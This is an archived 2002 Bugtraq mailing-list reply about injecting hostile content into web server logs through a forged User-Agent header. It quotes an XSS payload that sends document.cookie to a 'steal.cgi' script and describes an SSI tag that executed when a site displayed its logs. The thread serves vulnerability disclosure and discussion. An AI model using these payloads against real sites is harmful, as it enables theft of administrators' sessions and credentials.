|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: zeno (bugtraq
cgisecurity.net)Date: Sat May 25 2002 - 15:21:50 CDT
> normally it would contain something like... Mozilla/4.0 (compatible; MSIE
> 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
> ..
>
> but with a proxy prog (i use proxomitron) you can change it to whatever you
> like..
>
> for example: <img src="x.jpg"
> onError="this.src='steal.cgi?document.cookie';">
>
> and if the site logs it, you just got the administrators password:)
>
> Now, im yet to come across any sites that this works on because i just
> thought of it this afternoon but let me know if it works:) in any case, a
> lot of sites would log/store this kind of information so it should be fixed.
>
A hole in Analog and W3perl suffered from this problem. I'm sure
other software does.
I have personally found a example of
SSI tag inserting using this method on 1 website running "product unknown".
I inserted SSI into the User agent field and visit the site which displayed
the logs in a ssi page. It executed the ssi tag in which I inserted.
I just wrote a paper on cookie theft with xss
that may be worth a peek to you.
www.cgisecurity.com/articles/xss-faq.shtml
Also see
http://www.cgisecurity.net/papers/header-based-exploitation.txt
- zenocgisecurity.com
>
>
>
> _________________________________________________________________
> MSN Photos is the easiest way to share and print your photos:
> http://photos.msn.com/support/worldwide.aspx
>
>
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]